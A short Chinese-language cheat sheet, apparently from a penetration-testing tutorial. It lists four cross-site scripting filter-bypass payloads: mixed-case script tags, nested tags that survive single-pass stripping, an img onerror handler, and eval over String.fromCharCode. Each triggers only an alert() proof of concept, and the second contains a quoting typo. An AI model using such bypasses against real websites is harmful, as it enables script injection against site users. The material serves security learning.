1.<Script>alert('xss')</Script> 大小写绕过
2.<scr<script>ipt>alert('xss)</scr</script>ipt> 会过滤<script></script>一次。所有重复绕过
3.<img src=1 onerror=alert('xss')> 当做了对script过滤,只要出现就错误时,可使用onerror绕过。
例:如果在加载图片时发生错误则执行 JavaScript(onerror) :<img src="image.gif" onerror="myFunction()">
4.<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 65, 78, 89, 34, 41))</script>。
String.fromCharCode 就是把ascii码转成字符串,然后eval就是把该字符串解析成javascript语句来执行。